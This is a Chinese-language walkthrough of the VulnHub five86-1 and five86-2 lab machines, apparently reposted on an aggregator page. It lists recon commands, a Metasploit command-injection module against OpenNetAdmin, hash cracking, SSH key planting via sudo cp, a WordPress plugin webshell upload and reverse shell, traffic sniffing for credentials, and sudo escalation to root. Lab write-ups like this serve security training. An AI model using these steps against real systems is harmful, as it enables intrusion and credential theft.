当前位置: 首页 > news >正文

vulnhub five86系列靶机合集

five86 ~ VulnHubhttps://www.vulnhub.com/series/five86,272/

five86-1渗透过程

信息收集

# 主机发现
nmap 192.168.56.0/24 -Pn
​
# 靶机全面扫描
nmap 192.168.56.131 -A -T4

目录扫描

dirsearch -u http://192.168.56.131/

/robots.txt提示/ona。

/ona二层目录扫描。

弱口令登录OpenNetAdmin

/ona/login.php弱口令admin:admin成功登录。

OpenNetAdmin RCE漏洞利用

漏洞库搜索一下。

searchsploit opennetadmin

结合opennetadmin登录后的提示版本信息是v18.1.1,命令注入试一下。

msfconsole
use exploit/unix/webapp/opennetadmin_ping_cmd_injection
set LHOST 192.168.56.109
set RHOSTS 192.168.56.131
run

通过python获取tty。

python -c 'import pty;pty.spawn("/bin/bash")'

有五个用户。

在~/.htpasswd中得到提示:douglas的密码是十位,且包含aefhrt这些字符。

douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

To make things slightly less painful (a standard dictionary will likely fail),

use the following character set for this 10 character password: aefhrt

crunch生成字典

根据提示生成密码字典。

crunch 10 10 aefhrt -o passwd.txt

$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1保存为hash。

John --wordlist=字典  hash

fatherrrrr

切换到douglas。

sudo提权到jen用户

cp命令可用。

结合douglas目录下的.ssh,将id_rsa.pub复制到/jen/.ssh目录下就能通过密钥登录了。

cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh

成功登录jen用户。

登录到moss用户

登录到jen用户时提示有邮件,在邮件中找到moss密码Fire!Fire!

suid提权到root

可疑文件upyourgame。

执行一下,一段乱输入后成功提权。

get flag.txt🎆

five86-2渗透过程

信息收集

# 主机发现
namp 192.168.56.0/24 -Pn
​
# 全面扫描靶机
nmap 192.168.56.132 -A -T4

开放端口20,21,80。

访问80端口,发现是WordPress框架,页面显示有些问题,需要添加映射关系。(其实不改也不影响wpscan工作)

vim /etc/hosts
# 添加
192.168.56.132  five86-2

wpscan爆破用户名密码

wpscan --url http://five86-2/ -e u,p,t

扫描得出admin,barney,gillian,peter,stephen五个用户,接着爆破密码。

wpscan --url http://five86-2/  -U user.txt -P /usr/share/wordlists/rockyou.txt

得到两组用户名密码。

barney/spooky1
​
stephen/apollo1

都登录看看权限,明显的barney权限更高,但不是管理员权限。插件这里看见只有Insert or Embed Articulate Content into WordPress Trial这个插件被激活了。

wpscan插件利用

搜索得知插件Insert or Embed Articulate Content into WordPress Trial可以RCE。

  1. 准备两个文件,分别是index.html和一句话木马文件xx.php,压缩到zip文件中。

  2. Posts——》Add New。

    上传准备好的压缩包。

    出现以下页面表示可行,点击insert。

    插入成功后会提示上传路径/wp-content/uploads/articulate_uploads/a5/index.html

  3. 蚁剑连接。http://ip/wp-content/uploads/articulate_uploads/a5/xx.php

上传反弹shell文件php-reverse-shell.php

python3 -c 'import pty;pty.spawn("/bin/bash")'

wp-config.php找到数据库用户名密码dbuser/4Te3bRd483e

数据库操作:

show databases;
use wordpressdb;
show tables;
select * from wp_users;

注意WordPress是MD5加密

解不出来,先用之前获得的两组用户名密码试试,/home下有这两个用户。

成功切换到stephen。

tcpdump监听指定网卡获得敏感数据

id命令发现stephen在pcap组中。提示涉及到抓包?

# 打印所有可用作的接口
tcpdump -D
​
# 监控指定网卡120s将数据包写入/tmp/1.pcap
tcpdump -i vethf2b0415 -G 120 -W 1 -w /tmp/1.pcap

tcpdump -r 1.pcap读取数据包,得到ftp用户名和密码。paul/esomepasswford

通过密码成功切换到paul用户。

sudo提权

sudo提权。

service命令提权到peter用户。

sudo -u peter /usr/sbin/service ../../bin/sh

还是sudo提权。

可以以root权限运行passwd命令,那么直接修改root密码吧。sudo passwd root

get thisistheflag.txt🎆

相关文章:

  • HTTP:十.cookie机制
  • 2000-2017年各省城市液化石油气供气总量数据
  • 硬件工程师笔记——电子器件汇总大全
  • HTML — 总结
  • LeetCode[225]用队列实现栈
  • LeetCode 每日一题 2563. 统计公平数对的数目
  • WEMOS LOLIN32
  • python之计算平面曲线离散点的曲率
  • vivo把三颗「主摄」放进了手机
  • cpp知识章节
  • SpringAI系列 - MCP篇(一) - 什么是MCP
  • VitePress搭建-接入giscus的注意事项。
  • 第十章 继承与派生
  • PCL库开发入门
  • 【C++】win 10 / win 11:Dev-C++ 下载与安装
  • 域名解析,配置Linux系统的固定IP地址
  • 大模型应用开发自学笔记
  • 右起第2个LED灯的闪烁(STC89C52单片机)
  • 车载测试用例开发-如何平衡用例覆盖度和测试效率的方法论
  • SpringBoot Actuator健康检查:自定义HealthIndicator
  • 毕节两兄弟摘马蜂窝致路人被蜇去世,涉嫌过失致人死亡罪被公诉
  • 上海4-6月文博美展、剧目演出不断,将开设直播推出文旅优惠套餐
  • 新东方:2025财年前三季度净利增29%,第四财季海外业务将承压
  • 再放宽!新版市场准入负面清单发布,无人驾驶航空器、电子烟等新业态被纳入
  • 这场宣介会,重庆市委书记和中联部部长同台为外宾答疑解惑
  • 巴基斯坦航天员选拔工作正在进行,1人将以载荷专家身份参加联合飞行